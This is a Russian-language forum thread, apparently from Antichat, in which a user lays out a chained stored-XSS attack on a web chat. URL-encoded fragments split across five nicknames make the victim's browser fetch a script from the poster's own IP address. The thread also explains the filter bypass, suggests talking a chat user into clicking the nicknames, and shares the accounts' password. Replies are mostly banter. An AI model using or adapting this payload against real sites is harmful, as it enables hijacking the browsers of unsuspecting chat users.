ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Надо статью сделать "Русский язык для хакера". Какие там Xss, Sql и т.д. Русский надо знать сначала. Хотя бы чтобы тебя понимали.

__________________

Завтра будет.Лучше.

Читайте пожалуйста вдумчиво!!!!!!!!

Заходим под пятью никами:

1) %27,d%3Ddocument,%27
2) %27,s%3Dd.scripts[0],%27 <--! Прошу обратить внемание, mах длина Логина 24 символа всё что после режется фильтром. Вот свезло так свизло Символ в символ -->
3) %27,p%3D"http://",%27
4) %27,p%3Dp+%27my_IP
5) %27,s.src%3Dp,%27 <--! После клика по етому нику Броузер обратится к моему компу на 80 порт по HTTP(чтобы подкачать скрипт) А там Apach висит, а в файле index.html записан Script Захватывающий контроль над броузером -->

%27 значит ' <--! Обход фильтров -->
%3D значит =

Затем упрашиваем Чатлана попорядку кликнуть по никам и ............

Если у когото будет желани проверить Логиньтесь под етими никами только неполитесь и в Главную комнату не суйтесь Пароль на все ники 123
Затем просто наведите мыш на ник и посмотрите в строку состояния броузера.


Ну вроде всё расписал подробно !!!
Ёщё будут вопросы???

Да и помогать до ламывать не надо Забудьте я пошутил.

Как ты себе это представляешь? Слушай! сними видео о том, как зайти под пятью никами...

faust45, теоретически понятно как ты хотел сделать, но на практике на том чате я не представляю.
Так чего, тему закрывать?

__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•

по видимому, да. не можем мы его допонять полностью.

Слушай censored!
Всё что я написал реально работает я всё ето проделывал лично.
Я просто думал , может на основе етой дыры кто то ломанёт ещё круче .
А никто неможет вьехать даже в расжованый XSS

Да тему закрывай.

ДА Я ЛАМЕР

а почему ник у тя фиолетовый?